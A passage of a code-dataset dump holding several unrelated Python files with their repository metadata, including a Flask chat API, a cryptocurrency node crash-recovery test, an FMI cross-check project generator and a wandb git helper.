        Helper method for finding map index.  x and y are in the map
        coordinate system.
        """
        x -= self.origin_x
        y -= self.origin_y
        row = int(np.floor(y / self.resolution))
        col = int(np.floor(x / self.resolution))
        return row, col
    def set_cell(self, x, y, val):
        """
        Set the value in the grid cell containing position (x,y).
        x and y are in the map coordinate system.  No effect if (x,y)
        is out of bounds.
        """
        row, col = self.cell_index(x, y)
        try:
            # Negative indices would silently wrap around in numpy, so
            # they are rejected explicitly; IndexError covers overflow.
            if row >= 0 and col >= 0:
                self.grid[row, col] = val
        except IndexError:
            pass
    def get_cell(self, x, y):
        """
        Get the value from the grid cell containing position (x,y).
        x and y are in the map coordinate system.  Return 'nan' if
        (x,y) is out of bounds.
        """
        row, col = self.cell_index(x, y)
        try:
            if row >= 0 and col >= 0:
                return self.grid[row, col]
            else:
                return float('nan')
        except IndexError:
            return float('nan')
| [
"noitsnotmridul@gmail.com"
] | noitsnotmridul@gmail.com |
824b982e5971777c7f478481c050559850dd8baa | aada3c89a69d3d24bd1526b60edefb7a17766fce | /serv/chats.py | 144a6d823cb8cea0cd13b0e2ade6102ca6fd8c25 | [] | no_license | liuyang9643/AI_toy | d67530a2ba89f725417ab30ef6494c40cc0a530e | dfb1f939aeecc591c318e4e49c3de9ff7328a068 | refs/heads/main | 2023-05-13T16:06:53.862771 | 2021-06-04T11:26:33 | 2021-06-04T11:26:33 | 373,808,200 | 0 | 0 | null | 2021-06-04T11:26:34 | 2021-06-04T10:38:53 | Python | UTF-8 | Python | false | false | 2,085 | py | import time
from bson import ObjectId
from flask import Blueprint, jsonify, request
from setting import MongoDB, RET
from baidu_ai import text2audio
from redis_msg import get_redis_msg, get_redis_msg_app
chat = Blueprint("chat", __name__)
# Return the message list for one chat window.
@chat.route("/chat_list", methods=["POST"])
def chat_list():
    # Look up the chat document by its MongoDB _id (form field "chat_id").
    chat_info = request.form.to_dict()
    chat_window = MongoDB.chats.find_one({"_id": ObjectId(chat_info.get("chat_id"))})
    # Presumably clears the unread counter for this sender/receiver pair
    # -- confirm against redis_msg.get_redis_msg_app.
    get_redis_msg_app(chat_info.get("sender"), chat_info.get("receiver"))
    RET["code"] = 0
    RET["msg"] = "查询聊天记录"
    RET["data"] = chat_window.get("chat_list")
    return jsonify(RET)
# Receive messages addressed to a toy.
@chat.route("/recv_msg", methods=["POST"])
def recv_msg():
    # Look up the chat window for this sender/receiver pair.
    chat_info = request.form.to_dict()
    # Unread/offline message count for the current sender and receiver.
    sender, count = get_redis_msg(chat_info.get("sender"), chat_info.get("receiver"))
    chat_window = MongoDB.chats.find_one({"user_list": {"$all": [sender, chat_info.get("receiver")]}})
    if count != 0:
        # Take the `count` newest messages, newest first.
        chat_one = chat_window.get("chat_list")[-count:]  # type:list
        chat_one.reverse()
        # Default remark ("stranger"); replaced when the sender is a friend.
        remark = "陌人生"
        toy = MongoDB.toys.find_one({"_id": ObjectId(chat_info.get("receiver"))})
        for friend in toy.get("friend_list"):
            if friend.get("friend_id") == sender:
                remark = friend.get("friend_remark")
        # Synthesized announcement: "the following messages are from <remark>".
        xxtx = text2audio(f"以下是来自{remark}的消息")
        xxtx_dict = {
            "sender": sender,
            "receiver": chat_info.get("receiver"),
            "chat": xxtx,
            "createTime": time.time()
        }
        chat_one.append(xxtx_dict)
        return jsonify(chat_one)
    else:
        # No pending messages: synthesized "you have no new messages" reply.
        xxtx = text2audio(f"你还没有收到消息哦")
        xxtx_dict = {
            "sender": "ai",
            "receiver": chat_info.get("receiver"),
            "chat": xxtx,
            "createTime": time.time()
        }
        return jsonify([xxtx_dict])
| [
"1019798260@qq.com"
] | 1019798260@qq.com |
92d200c82f3f0e1c236dd751dfc38a84ec6d134f | d2b87736df0717de07b2940d25ef8125bc709965 | /CookBook.py | 56d36a8a0ddad932efb8e2eb653b02706f01e9a7 | [] | no_license | AlexP-1/CookBook | 358e8061db9d94ee6b54b97373e579abf6aa70b5 | 81d856dc0ffe9d51f7353b371a2871880ba37dc8 | refs/heads/master | 2022-07-07T02:39:59.336589 | 2020-05-20T19:02:43 | 2020-05-20T19:02:43 | 265,644,461 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,263 | py | from pprint import pprint
def create_book(book_name):
    """Parse a recipe file into {dish_name: [ingredient dicts]}.

    File format, repeated per dish:
        <dish name>
        <number of ingredients>
        <name>|<quantity>|<measure>   (one line per ingredient)
        <blank separator line>

    Each ingredient dict has keys 'ingredient_name', 'quantity' and
    'measure' (all values kept as strings).

    Bug fix: the original ignored *book_name* and always opened the
    hard-coded 'cook.txt'; the parameter is now honoured.
    """
    cook_dict = {}
    with open(book_name, encoding='UTF-8') as fi:
        for line in fi:
            dish_name = line.strip()
            cook_dict[dish_name] = []
            counter = int(fi.readline().strip())
            for _ in range(counter):
                ingredients = fi.readline().strip().split('|')
                temp_dict = {'ingredient_name': ingredients[0],
                             'quantity': ingredients[1],
                             'measure': ingredients[2]}
                cook_dict[dish_name].append(temp_dict)
            fi.readline()  # consume the blank separator line
    return cook_dict
def get_shop_list_by_dishes(dishes, persons):
    """Build a shopping list for cooking ``dishes`` for ``persons`` people.

    Args:
        dishes: iterable of dish names; names absent from the cook book are
            silently skipped.
        persons: number of servings to scale each ingredient quantity by.

    Returns:
        dict mapping ingredient name to {'measure': str, 'quantity': int}.

    Fixed: the accumulation branch previously computed
    ``int((ingredients['quantity']) * persons)`` which *repeats the quantity
    string* before converting (e.g. '2' * 3 -> '222' -> 222) instead of
    multiplying the number.
    """
    cook_dict = create_book('cook.txt')
    shoplist = {}
    for dish_name in dishes:
        if dish_name in cook_dict:
            for ingredients in cook_dict[dish_name]:
                name = ingredients['ingredient_name']
                amount = int(ingredients['quantity']) * persons
                if name in shoplist:
                    shoplist[name]['quantity'] += amount
                else:
                    shoplist[name] = {'measure': ingredients['measure'],
                                      'quantity': amount}
    return shoplist
| [
"panyushkin91@mail.ru"
] | panyushkin91@mail.ru |
cca894e770a3e8d3ac6e03569334283372f9d669 | 352e8838240161fbd421943a568fe9624167585a | /test/functional/dbcrash.py | 068e9e27ac06fc49254ef5d86ccbc4fda399afcc | [
"MIT"
] | permissive | starshipcoin/starshipsha | 3e405753796275cf8944a4e84109bd7936eb0996 | 7d7e2764c00a3dc4af08d77f175ffffc98c0c780 | refs/heads/master | 2020-03-27T05:06:38.919129 | 2018-08-24T13:25:04 | 2018-08-24T13:25:04 | 145,994,504 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,440 | py | #!/usr/bin/env python3
# Copyright (c) 2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test recovery from a crash during chainstate writing.
- 4 nodes
* node0, node1, and node2 will have different dbcrash ratios, and different
dbcache sizes
* node3 will be a regular node, with no crashing.
* The nodes will not connect to each other.
- use default test framework starting chain. initialize starting_tip_height to
tip height.
- Main loop:
* generate lots of transactions on node3, enough to fill up a block.
* uniformly randomly pick a tip height from starting_tip_height to
tip_height; with probability 1/(height_difference+4), invalidate this block.
* mine enough blocks to overtake tip_height at start of loop.
* for each node in [node0,node1,node2]:
- for each mined block:
* submit block to node
* if node crashed on/after submitting:
- restart until recovery succeeds
- check that utxo matches node3 using gettxoutsetinfo"""
import errno
import http.client
import random
import sys
import time
from test_framework.mininode import *
from test_framework.script import *
from test_framework.test_framework import StarshipshaTestFramework
from test_framework.util import *
# Exceptions that indicate the RPC connection to a node dropped — expected in
# this test, since nodes deliberately crash mid-request.
# http.client.RemoteDisconnected only exists on Python >= 3.5, hence the
# feature test instead of a version check.
HTTP_DISCONNECT_ERRORS = [http.client.CannotSendRequest]
try:
    HTTP_DISCONNECT_ERRORS.append(http.client.RemoteDisconnected)
except AttributeError:
    pass
class ChainstateWriteCrashTest(StarshipshaTestFramework):
    """Functional test: recovery from crashes during chainstate flushes.

    Nodes 0-2 run with -dbcrashratio so they randomly abort while writing the
    chainstate; node3 is a stable miner used as the reference. After every
    batch of blocks, each crashing node's UTXO-set hash must match node3's.
    """
    def set_test_params(self):
        """Configure 4 unconnected nodes: three crashing nodes with different
        dbcrash ratios / cache sizes, plus a normal full-block miner (node3)."""
        self.num_nodes = 4
        self.setup_clean_chain = False
        # Set -maxmempool=0 to turn off mempool memory sharing with dbcache
        # Set -rpcservertimeout=900 to reduce socket disconnects in this
        # long-running test
        self.base_args = ["-limitdescendantsize=0", "-maxmempool=0", "-rpcservertimeout=900", "-dbbatchsize=200000"]
        # Set different crash ratios and cache sizes. Note that not all of
        # -dbcache goes to pcoinsTip.
        self.node0_args = ["-dbcrashratio=8", "-dbcache=4"] + self.base_args
        self.node1_args = ["-dbcrashratio=16", "-dbcache=8"] + self.base_args
        self.node2_args = ["-dbcrashratio=24", "-dbcache=16"] + self.base_args
        # Node3 is a normal node with default args, except will mine full blocks
        self.node3_args = ["-blockmaxweight=4000000"]
        self.extra_args = [self.node0_args, self.node1_args, self.node2_args, self.node3_args]
    def setup_network(self):
        """Start all nodes without connecting them to each other."""
        # Need a bit of extra time for the nodes to start up for this test
        self.add_nodes(self.num_nodes, extra_args=self.extra_args, timewait=90)
        self.start_nodes()
        # Leave them unconnected, we'll use submitblock directly in this test
    def restart_node(self, node_index, expected_tip):
        """Start up a given node id, wait for the tip to reach the given block hash, and calculate the utxo hash.
        Exceptions on startup should indicate node crash (due to -dbcrashratio), in which case we try again. Give up
        after 120 seconds. Returns the utxo hash of the given node."""
        time_start = time.time()
        while time.time() - time_start < 120:
            try:
                # Any of these RPC calls could throw due to node crash
                self.start_node(node_index)
                self.nodes[node_index].waitforblock(expected_tip)
                utxo_hash = self.nodes[node_index].gettxoutsetinfo()['hash_serialized_2']
                return utxo_hash
            except:
                # An exception here should mean the node is about to crash.
                # If starshipshad exits, then try again. wait_for_node_exit()
                # should raise an exception if starshipshad doesn't exit.
                self.wait_for_node_exit(node_index, timeout=10)
                self.crashed_on_restart += 1
                time.sleep(1)
        # If we got here, starshipshad isn't coming back up on restart. Could be a
        # bug in starshipshad, or we've gotten unlucky with our dbcrash ratio --
        # perhaps we generated a test case that blew up our cache?
        # TODO: If this happens a lot, we should try to restart without -dbcrashratio
        # and make sure that recovery happens.
        raise AssertionError("Unable to successfully restart node %d in allotted time", node_index)
    def submit_block_catch_error(self, node_index, block):
        """Try submitting a block to the given node.
        Catch any exceptions that indicate the node has crashed.
        Returns true if the block was submitted successfully; false otherwise."""
        try:
            self.nodes[node_index].submitblock(block)
            return True
        except http.client.BadStatusLine as e:
            # Prior to 3.5 BadStatusLine('') was raised for a remote disconnect error.
            if sys.version_info[0] == 3 and sys.version_info[1] < 5 and e.line == "''":
                self.log.debug("node %d submitblock raised exception: %s", node_index, e)
                return False
            else:
                raise
        except tuple(HTTP_DISCONNECT_ERRORS) as e:
            self.log.debug("node %d submitblock raised exception: %s", node_index, e)
            return False
        except OSError as e:
            self.log.debug("node %d submitblock raised OSError exception: errno=%s", node_index, e.errno)
            if e.errno in [errno.EPIPE, errno.ECONNREFUSED, errno.ECONNRESET]:
                # The node has likely crashed
                return False
            else:
                # Unexpected exception, raise
                raise
    def sync_node3blocks(self, block_hashes):
        """Use submitblock to sync node3's chain with the other nodes
        If submitblock fails, restart the node and get the new utxo hash.
        If any nodes crash while updating, we'll compare utxo hashes to
        ensure recovery was successful."""
        node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
        # Retrieve all the blocks from node3
        blocks = []
        for block_hash in block_hashes:
            blocks.append([block_hash, self.nodes[3].getblock(block_hash, 0)])
        # Deliver each block to each other node
        for i in range(3):
            nodei_utxo_hash = None
            self.log.debug("Syncing blocks to node %d", i)
            for (block_hash, block) in blocks:
                # Get the block from node3, and submit to node_i
                self.log.debug("submitting block %s", block_hash)
                if not self.submit_block_catch_error(i, block):
                    # TODO: more carefully check that the crash is due to -dbcrashratio
                    # (change the exit code perhaps, and check that here?)
                    self.wait_for_node_exit(i, timeout=30)
                    self.log.debug("Restarting node %d after block hash %s", i, block_hash)
                    nodei_utxo_hash = self.restart_node(i, block_hash)
                    assert nodei_utxo_hash is not None
                    self.restart_counts[i] += 1
                else:
                    # Clear it out after successful submitblock calls -- the cached
                    # utxo hash will no longer be correct
                    nodei_utxo_hash = None
            # Check that the utxo hash matches node3's utxo set
            # NOTE: we only check the utxo set if we had to restart the node
            # after the last block submitted:
            # - checking the utxo hash causes a cache flush, which we don't
            # want to do every time; so
            # - we only update the utxo cache after a node restart, since flushing
            # the cache is a no-op at that point
            if nodei_utxo_hash is not None:
                self.log.debug("Checking txoutsetinfo matches for node %d", i)
                assert_equal(nodei_utxo_hash, node3_utxo_hash)
    def verify_utxo_hash(self):
        """Verify that the utxo hash of each node matches node3.
        Restart any nodes that crash while querying."""
        node3_utxo_hash = self.nodes[3].gettxoutsetinfo()['hash_serialized_2']
        self.log.info("Verifying utxo hash matches for all nodes")
        for i in range(3):
            try:
                nodei_utxo_hash = self.nodes[i].gettxoutsetinfo()['hash_serialized_2']
            except OSError:
                # probably a crash on db flushing
                nodei_utxo_hash = self.restart_node(i, self.nodes[3].getbestblockhash())
            assert_equal(nodei_utxo_hash, node3_utxo_hash)
    def generate_small_transactions(self, node, count, utxo_list):
        """Create up to `count` small 2-input/3-output transactions on `node`,
        consuming utxos from `utxo_list` (which is shuffled and mutated)."""
        FEE = 1000  # TODO: replace this with node relay fee based calculation
        num_transactions = 0
        random.shuffle(utxo_list)
        while len(utxo_list) >= 2 and num_transactions < count:
            tx = CTransaction()
            input_amount = 0
            for i in range(2):
                utxo = utxo_list.pop()
                tx.vin.append(CTxIn(COutPoint(int(utxo['txid'], 16), utxo['vout'])))
                input_amount += int(utxo['amount'] * COIN)
            output_amount = (input_amount - FEE) // 3
            if output_amount <= 0:
                # Sanity check -- if we chose inputs that are too small, skip
                continue
            for i in range(3):
                tx.vout.append(CTxOut(output_amount, hex_str_to_bytes(utxo['scriptPubKey'])))
            # Sign and send the transaction to get into the mempool
            tx_signed_hex = node.signrawtransaction(ToHex(tx))['hex']
            node.sendrawtransaction(tx_signed_hex)
            num_transactions += 1
    def run_test(self):
        """Main loop: mine/reorg on node3, replay blocks into the crashing
        nodes, and verify the utxo set survives every crash/restart."""
        # Track test coverage statistics
        self.restart_counts = [0, 0, 0]  # Track the restarts for nodes 0-2
        self.crashed_on_restart = 0  # Track count of crashes during recovery
        # Start by creating a lot of utxos on node3
        initial_height = self.nodes[3].getblockcount()
        utxo_list = create_confirmed_utxos(self.nodes[3].getnetworkinfo()['relayfee'], self.nodes[3], 5000)
        self.log.info("Prepped %d utxo entries", len(utxo_list))
        # Sync these blocks with the other nodes
        block_hashes_to_sync = []
        for height in range(initial_height + 1, self.nodes[3].getblockcount() + 1):
            block_hashes_to_sync.append(self.nodes[3].getblockhash(height))
        self.log.debug("Syncing %d blocks with other nodes", len(block_hashes_to_sync))
        # Syncing the blocks could cause nodes to crash, so the test begins here.
        self.sync_node3blocks(block_hashes_to_sync)
        starting_tip_height = self.nodes[3].getblockcount()
        # Main test loop:
        # each time through the loop, generate a bunch of transactions,
        # and then either mine a single new block on the tip, or some-sized reorg.
        for i in range(40):
            self.log.info("Iteration %d, generating 2500 transactions %s", i, self.restart_counts)
            # Generate a bunch of small-ish transactions
            self.generate_small_transactions(self.nodes[3], 2500, utxo_list)
            # Pick a random block between current tip, and starting tip
            current_height = self.nodes[3].getblockcount()
            random_height = random.randint(starting_tip_height, current_height)
            self.log.debug("At height %d, considering height %d", current_height, random_height)
            if random_height > starting_tip_height:
                # Randomly reorg from this point with some probability (1/4 for
                # tip, 1/5 for tip-1, ...)
                if random.random() < 1.0 / (current_height + 4 - random_height):
                    self.log.debug("Invalidating block at height %d", random_height)
                    self.nodes[3].invalidateblock(self.nodes[3].getblockhash(random_height))
            # Now generate new blocks until we pass the old tip height
            self.log.debug("Mining longer tip")
            block_hashes = []
            while current_height + 1 > self.nodes[3].getblockcount():
                block_hashes.extend(self.nodes[3].generate(min(10, current_height + 1 - self.nodes[3].getblockcount())))
            self.log.debug("Syncing %d new blocks...", len(block_hashes))
            self.sync_node3blocks(block_hashes)
            utxo_list = self.nodes[3].listunspent()
            self.log.debug("Node3 utxo count: %d", len(utxo_list))
        # Check that the utxo hashes agree with node3
        # Useful side effect: each utxo cache gets flushed here, so that we
        # won't get crashes on shutdown at the end of the test.
        self.verify_utxo_hash()
        # Check the test coverage
        self.log.info("Restarted nodes: %s; crashes on restart: %d", self.restart_counts, self.crashed_on_restart)
        # If no nodes were restarted, we didn't test anything.
        assert self.restart_counts != [0, 0, 0]
        # Make sure we tested the case of crash-during-recovery.
        assert self.crashed_on_restart > 0
        # Warn if any of the nodes escaped restart.
        for i in range(3):
            if self.restart_counts[i] == 0:
                self.log.warn("Node %d never crashed during utxo flush!", i)
# Script entry point: run the functional test via the framework's main().
if __name__ == "__main__":
    ChainstateWriteCrashTest().main()
| [
"khryptor@starshipcoin.com"
] | khryptor@starshipcoin.com |
c174a2e44b99cb6349ff944069b1b602555b46c7 | 892c35f72f46f145c3f3860c1c29f1f4503ef9a6 | /search/search.py | fb2fa2520ad49d842fb5e069fbe0011cfdf4eb90 | [] | no_license | pymmrd/tuangou | aaa2b857e352f75f2ba0aa024d2880a6adac21a8 | 8f6a35dde214e809cdd6cbfebd8d913bafd68fb2 | refs/heads/master | 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | import re
import string
from django.db.models import Q
from django.conf import settings
from tuangou.search.models import SearchTerm
from tuangou.stats.utils import stats
from tuangou.utils.location import get_current_city
def store(request, q):
    """Record the search query for analytics.

    A term is stored at most once per tracking id, and only when it is at
    least two characters long. The authenticated user (if any) and the
    client IP are attached to the record.
    """
    if len(q) < 2:
        return
    tracking_id = stats.tracking_id(request)
    already_logged = SearchTerm.objects.filter(tracking_id=tracking_id, q=q).count()
    if already_logged:
        return
    term = SearchTerm()
    term.q = q
    term.tracking_id = stats.tracking_id(request)
    term.ip_address = request.META.get('REMOTE_ADDR')
    term.user = request.user if request.user.is_authenticated() else None
    term.save()
def deals(request, search_text):
    """Return non-expired deals matching every word in ``search_text``.

    Args:
        request: the current HttpRequest (kept for view-helper signature
            compatibility; not otherwise used).
        search_text: iterable of search words. NOTE(review): a plain string
            would be filtered per *character* -- confirm callers split the
            query first.

    Returns:
        dict with a single key ``'deals'`` mapping to at most
        ``settings.DEAL_PER_ROW`` matching ``ReDeal`` rows.

    Fixed: removed the unused ``city`` session lookup and the dead
    ``results['deals'] = {}`` initialisation that was unconditionally
    overwritten after the loop.
    """
    # Imported locally, presumably to avoid a circular import between the
    # search and guider apps -- TODO confirm.
    from tuangou.guider.models import ReDeal
    deals = ReDeal.nonexpires.all()
    # Require every word to appear in the title or the division name.
    for word in search_text:
        deals = deals.filter(Q(title__contains=word) |
                             Q(division__name__contains=word))
    return {'deals': deals[:settings.DEAL_PER_ROW]}
| [
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] | zg163@zg163-Lenovo-IdeaPad-Y470.(none) |
f0f6ee583c0fbd31d8ee142af619d661daa1f4be | d613fdf2a0881b9749b8c0af40c178e5a1756c7f | /cross-check/scripts/generate_mastersim_projects.py | fb15363ad744363477dcbb799db2708fa3a1a0b1 | [] | no_license | mazbrili/mastersim | 07840c7f8320b48f8e12304c2627f74d95552c19 | 1b948471474659518c78c3886bd1aff51610e2b5 | refs/heads/master | 2022-12-11T21:58:06.379519 | 2020-04-23T10:26:50 | 2020-04-23T10:26:50 | 294,000,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,116 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Cross-check helper script, generates MasterSim project files and imports required files.
Copyright 2019, Andreas Nicolai <andreas.nicolai@gmx.net>
Run this script from within a directory that contains the content of the 'fmi-cross-check' github repository.
Script will create a subdirectory 'msim' within it will create for each test fmu another subdirectory.
Use the command line arguments to filter out unneeded test cases.
If a subdirectory already exists, it will be skipped and a warning will be printed.
> python generate_mastersim_projects.py [-t <tool>] [-v 1|2] [-p <platform>] <fmi-directory>
Arguments:
-t <tool> Which tool/vendor (basically the subdirectory name) to use; use all if omitted
-v 1|2 Use either version 1 or 2 of the standard; use all if omitted
-p <platform> Platform (win64, darwin64, linux64); use all if omitted
Example:
> generate_mastersim_projects.py -v 1 -p linux64
Will process all test cases within directory:
fmi-cross-check/fmus/1.0/cs/linux64/*
"""
import os
import platform
import argparse
import csv
import MasterSimTestGenerator as msimGenerator
# Source tree with the fmi-cross-check test FMUs, and the output directory
# into which one MasterSim project subdirectory per FMU is generated.
FMI_CROSS_CHECK_DIRECTORY = "fmi-cross-check"
MSIM_DIRECTORY = "msim"
# *** main program ***
# command line arguments
parser = argparse.ArgumentParser(description="Runs cross-check tests for MasterSim")
parser.add_argument('-t', action="store", dest="tool", help="Tool/vendor directory to process")
parser.add_argument('-v', action="store", dest="fmiVersion", help="FMI version to use.")
parser.add_argument('-p', action="store", dest="platform", help="Platform (win64, darwin64, linux64).")
args = parser.parse_args()
fullPath = os.path.abspath(FMI_CROSS_CHECK_DIRECTORY)
fullPath = fullPath.replace('\\', '/') # windows fix
fullPathParts = fullPath.split('/')
# check if directory exists
if not os.path.exists(fullPath):
    print("Directory '{}' does not exist.".format(fullPath))
    exit(1)
# check if target directory exists, otherwise attempt to create it
msimFullPath = os.path.abspath(MSIM_DIRECTORY)
if os.path.exists(msimFullPath):
    if os.path.isfile(msimFullPath):
        print("Target directory '{}' exists as file.".format(msimFullPath))
        exit(1)
else:
    os.mkdir(msimFullPath)
    if not os.path.exists(msimFullPath):
        print("Cannot create target directory '{}'.".format(msimFullPath))
        exit(1)
# now parse file list and generate project files
# NOTE(review): fmuList is never appended to or read below -- appears unused.
fmuList = []
print("Collecting list of FMUs to import and test-run")
# filter out platform, if given; default to the platform we are running on
osType = args.platform
if osType == None:
    s = platform.system()
    if s == "Linux":
        osType = "linux64"
    elif s == "Windows":
        print("Selecting 'win64' platform")
        osType = "win64"
    else:
        osType = "darwin64"
for root, dirs, files in os.walk(fullPath, topdown=False):
    root = os.path.join(fullPath, root) # full path to current fmu file
    rootStr = root.replace('\\', '/') # windows fix
    pathParts = rootStr.split('/') # split into component
    pathParts = pathParts[len(fullPathParts):] # keep only path parts below toplevel dir
    # Expected layout: fmus/<fmi-version>/<cs|me>/<platform>/<vendor>/...
    # we only process directories that can actually contain models, that means more than 4 path parts
    if len(pathParts) < 5:
        continue
    relPath = '/'.join(pathParts[1:]) # compose relative path
    # filter out everything except the fmus sub-directory
    if pathParts[0] != "fmus":
        continue
    # filter out Model Exchange fmus
    if pathParts[2] == "me":
        continue
    # filter out fmi version if given
    if args.fmiVersion != None:
        found = False
        if args.fmiVersion == "1" and pathParts[1] == "1.0":
            found = True
        if args.fmiVersion == "2" and pathParts[1] == "2.0":
            found = True
        if not found:
            continue
    if pathParts[3] != osType:
        continue
    # filter out vendor/tool, if given
    if args.tool != None and pathParts[4] != args.tool:
        continue
    # now find .fmu files
    for name in files:
        # NOTE(review): 'e' is reused as the exception name in the try/except
        # below; harmless here, but easy to trip over when editing.
        e = os.path.splitext(name)
        if len(e) == 2 and e[1] == '.fmu':
            fmuPath = os.path.join(root, name)
            fmuCase = fmuPath[:-4] # strip the trailing .fmu
            # generate path to target directory, hereby substitute / with _ so that we only have one directory level
            relPath = os.path.split(os.path.relpath(fmuCase, fullPath))[0] # get relative path to directory with fmu file
            relPath = relPath.replace('\\', '_') # windows fix
            relPath = relPath.replace('/', '_')
            relPath = MSIM_DIRECTORY + '/' + relPath
            # create directory if not existing
            if not os.path.exists(relPath):
                os.mkdir(relPath)
            # setup test generator (parse input files)
            try:
                masterSim = msimGenerator.MasterSimTestGenerator()
                masterSim.setup(fmuCase)
            except Exception as e:
                print(e)
                # create a 'fail' file with error message
                with open(relPath + "/rejected", 'w') as file:
                    file.write(str(e) + "\n")
                continue
            # generate MasterSim file
            if not masterSim.generateMSim(relPath, pathParts[1]=="1.0"):
                continue # MasterSim project file exists already, skip FMU
            relPathFMUStr = os.path.join(relPath, name)
            print(relPathFMUStr + " processed...")
print("MasterSim project files regenerated.")
| [
"ghorwin@dd098b5a-9c97-4e98-abe7-e951c7a10ce5"
] | ghorwin@dd098b5a-9c97-4e98-abe7-e951c7a10ce5 |
e280ebb8627684e99bd5176969d872b102c80446 | a301b758065ea4040533d21f9bf322a084e0689c | /wandb/internal/git_repo.py | 3a5e935b7105a9d2ccc0437710b644434cc40be9 | [] | no_license | nitin-test/client-ng | 813448c810698759760b3d842afbf91387c9ed41 | cde060e54caa99e4288cee17f15978ba647c7d04 | refs/heads/master | 2022-12-13T04:45:09.134606 | 2020-08-12T01:32:37 | 2020-08-12T01:32:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,495 | py | import logging
import os
from six.moves import configparser
logger = logging.getLogger(__name__)
class GitRepo(object):
    """Convenience wrapper around GitPython's ``git.Repo``.

    The repository is discovered lazily on first access of :attr:`repo`.
    When no usable repository exists (or ``remote`` is ``None``), every
    accessor degrades gracefully and returns ``None``/``False`` instead of
    raising.
    """
    def __init__(self, root=None, remote="origin", lazy=True):
        """Initialize the wrapper.

        Args:
            root: directory to search from (defaults to the current
                working directory at first access).
            remote: name of the git remote to use; ``None`` disables git.
            lazy: when False, resolve the repository immediately.
        """
        self.remote_name = remote
        self._root = root
        self._repo = None
        if not lazy:
            self.repo
    @property
    def repo(self):
        """The cached ``git.Repo`` instance, or ``False`` when unavailable."""
        if self._repo is None:
            if self.remote_name is None:
                self._repo = False
            else:
                try:
                    self._repo = Repo(
                        self._root or os.getcwd(), search_parent_directories=True
                    )
                except exc.InvalidGitRepositoryError:
                    logger.debug("git repository is invalid")
                    self._repo = False
        return self._repo
    def is_untracked(self, file_name):
        """True if ``file_name`` is untracked (or there is no repository)."""
        if not self.repo:
            return True
        return file_name in self.repo.untracked_files
    @property
    def enabled(self):
        """Whether a usable git repository was found."""
        return bool(self.repo)
    @property
    def root(self):
        """Top-level working directory, or ``False`` when unavailable."""
        if not self.repo:
            return False
        return self.repo.git.rev_parse("--show-toplevel")
    @property
    def dirty(self):
        """True when the working tree has uncommitted changes."""
        if not self.repo:
            return False
        return self.repo.is_dirty()
    @property
    def email(self):
        """The configured ``user.email``, or ``None``."""
        if not self.repo:
            return None
        try:
            return self.repo.config_reader().get_value("user", "email")
        except configparser.Error:
            return None
    @property
    def last_commit(self):
        """Hex SHA of the commit at HEAD, or ``None``."""
        if not self.repo:
            return None
        if not self.repo.head or not self.repo.head.is_valid():
            return None
        if len(self.repo.refs) > 0:
            return self.repo.head.commit.hexsha
        else:
            # No refs yet (fresh repo): fall back to show-ref --head.
            return self.repo.git.show_ref("--head").split(" ")[0]
    @property
    def branch(self):
        """Name of the currently checked-out branch, or ``None``."""
        if not self.repo:
            return None
        return self.repo.head.ref.name
    @property
    def remote(self):
        """The configured ``git.Remote``, or ``None`` when missing."""
        if not self.repo:
            return None
        try:
            return self.repo.remotes[self.remote_name]
        except IndexError:
            return None
    # the --submodule=diff option doesn't exist in pre-2.11 versions of git (november 2016)
    # https://stackoverflow.com/questions/10757091/git-list-of-all-changed-files-including-those-in-submodules
    @property
    def has_submodule_diff(self):
        """True when the installed git supports ``--submodule=diff`` (>= 2.11)."""
        if not self.repo:
            return False
        return self.repo.git.version_info >= (2, 11, 0)
    @property
    def remote_url(self):
        """URL of the configured remote, or ``None``."""
        if not self.remote:
            return None
        return self.remote.url
    @property
    def root_dir(self):
        """Top-level working directory, or ``None`` when unavailable."""
        if not self.repo:
            return None
        return self.repo.git.rev_parse("--show-toplevel")
    def get_upstream_fork_point(self):
        """Get the most recent ancestor of HEAD that occurs on an upstream
        branch.
        First looks at the current branch's tracking branch, if applicable. If
        that doesn't work, looks at every other branch to find the most recent
        ancestor of HEAD that occurs on a tracking branch.
        Returns:
            git.Commit object or None
        """
        possible_relatives = []
        try:
            if not self.repo:
                return None
            try:
                active_branch = self.repo.active_branch
            except (TypeError, ValueError):
                logger.debug("git is in a detached head state")
                return None  # detached head
            else:
                tracking_branch = active_branch.tracking_branch()
                if tracking_branch:
                    possible_relatives.append(tracking_branch.commit)
            if not possible_relatives:
                for branch in self.repo.branches:
                    tracking_branch = branch.tracking_branch()
                    if tracking_branch is not None:
                        possible_relatives.append(tracking_branch.commit)
            head = self.repo.head
            most_recent_ancestor = None
            for possible_relative in possible_relatives:
                # at most one:
                for ancestor in self.repo.merge_base(head, possible_relative):
                    if most_recent_ancestor is None:
                        most_recent_ancestor = ancestor
                    elif self.repo.is_ancestor(most_recent_ancestor, ancestor):
                        most_recent_ancestor = ancestor
            return most_recent_ancestor
        except exc.GitCommandError as e:
            logger.debug("git remote upstream fork point could not be found")
            logger.debug(e.message)
            return None
    def tag(self, name, message):
        """Create/replace tag ``wandb/<name>``; return the tag or ``None``.

        Fixed: this was the only accessor without an ``if not self.repo``
        guard, so it raised AttributeError instead of returning None when
        no repository is available.
        """
        if not self.repo:
            return None
        try:
            return self.repo.create_tag("wandb/" + name, message=message, force=True)
        except exc.GitCommandError:
            print("Failed to tag repository.")
            return None
    def push(self, name):
        """Force-push tag ``wandb/<name>`` to the remote; PushInfo or ``None``."""
        if self.remote:
            try:
                return self.remote.push("wandb/" + name, force=True)
            except exc.GitCommandError:
                logger.debug("failed to push git")
                return None
class FakeGitRepo(GitRepo):
    """Stand-in used when GitPython is not installed.

    Always reports "no repository", so every GitRepo accessor falls back to
    its None/False default.
    """
    @property
    def repo(self):
        return None
try:
from git import Repo, exc # type: ignore
except ImportError: # import fails if user doesn't have git
GitRepo = FakeGitRepo # type: ignore
| [
